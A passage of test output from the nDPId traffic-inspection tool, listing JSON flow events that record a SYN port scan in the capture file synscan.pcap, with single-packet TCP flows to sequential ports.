-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1096,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1096,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1097,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1934,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9290,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1934,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1098,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1098,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1097,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1988,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9290,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1988,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1098,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1098,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1045,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1045,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1941,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1104,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1941,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1104,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1981,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1104,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1981,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1104,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1105,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1105,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1107,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1828,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1108,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
